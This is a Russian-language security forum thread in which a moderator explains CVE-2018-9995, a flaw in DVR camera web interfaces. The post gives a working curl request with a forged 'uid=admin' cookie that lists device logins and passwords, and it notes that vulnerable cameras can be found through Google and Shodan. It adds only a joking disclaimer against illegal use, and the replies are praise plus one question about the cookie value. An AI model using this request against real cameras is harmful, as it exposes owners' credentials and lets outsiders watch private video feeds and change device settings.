• Открыта запись на вторую часть курса по анонимности и безопасности в сети интернет "Paranoid II" от команды codeby. Анонимные роутеры, Подъём, настройка и администрирование Tor-ноды, Работа с железом ПК, Удаление аппаратных закладок, Минимизация рисков, Авторские разработки и многое другое. Подробнее ...

Статья CVE-2018-9995 или как получить логин и пароль к DVR камере

Dr.Lafa

Dr.Lafa

Mod. Hardware
Gold Team
30.12.2016
510
1 036
Приветствую, форумчане. Не так давно была обнаружена , затрагивающая довольно большое количество камер.
Брешь позволяет одним запросом вытащить логины и пароли к веб интерфейсу DVR устройства, откуда, кстати, можно смотреть трансляцию/запись камеры, менять настройки и всё в этом духе.

Собственно запрос
Код:
curl "http://<dvr_host>:<port>/device.rsp?opt=user&cmd=list" -H "Cookie: uid=admin"
CVE-2018-9995 или как получить логин и пароль к DVR камере


Камеры неплохо "гуглятся" и находятся в шодане.
CVE-2018-9995 или как получить логин и пароль к DVR камере


CVE-2018-9995 или как получить логин и пароль к DVR камере

Не советую использовать всё это дело в незаконных целях (я должен был это сказать), по крайней мере потому, что подглядывать не хорошо;)
На автора есть эксплоит на питоне (хотя по мне проще написать свой)
 
ghost

ghost

YW1uZXNpYQo=
Gold Team
12.05.2016
1 535
3 096
Шикарная статья! (y)
 
grafomaf

grafomaf

Happy New Year
09.11.2017
51
42
шикарненькооо
 
Vander

Vander

CodebyTeam
Gold Team
16.01.2016
1 453
4 289
Однозначно в закладки)(y)
 
  • Нравится
Реакции: ghost
O

OBLIVIONNN

Happy New Year
22.08.2017
146
90
Я так понимаю uid это логин, но как тогда узнать uid если он по стандарту не admin ?
 
Мы в соцсетях:  ТелеграмВконтактеДзенФейсбукТвиттерЮтуб